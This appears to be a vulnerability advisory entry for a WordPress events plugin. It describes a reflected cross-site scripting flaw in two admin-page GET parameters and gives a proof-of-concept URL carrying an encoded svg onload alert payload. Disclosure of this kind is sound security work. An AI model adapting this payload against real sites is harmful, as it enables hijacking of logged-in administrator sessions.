The plugin does not sanitise, validate or escape its importrowscount and successimportcount GET parameters before outputting them back in an admin page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
http://wp.lab/wordpress/wp-admin/admin.php?page=community-events-venues&messages=9&importrowscount=%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E&successimportcount=%3Csvg%2Fonload%3Dalert%28%2FXSS2%2F%29%3E
iohex
iohex
Yes
2021-07-02 (about 1 years ago)
2021-07-02 (about 1 years ago)
2022-01-17 (about 1 years ago)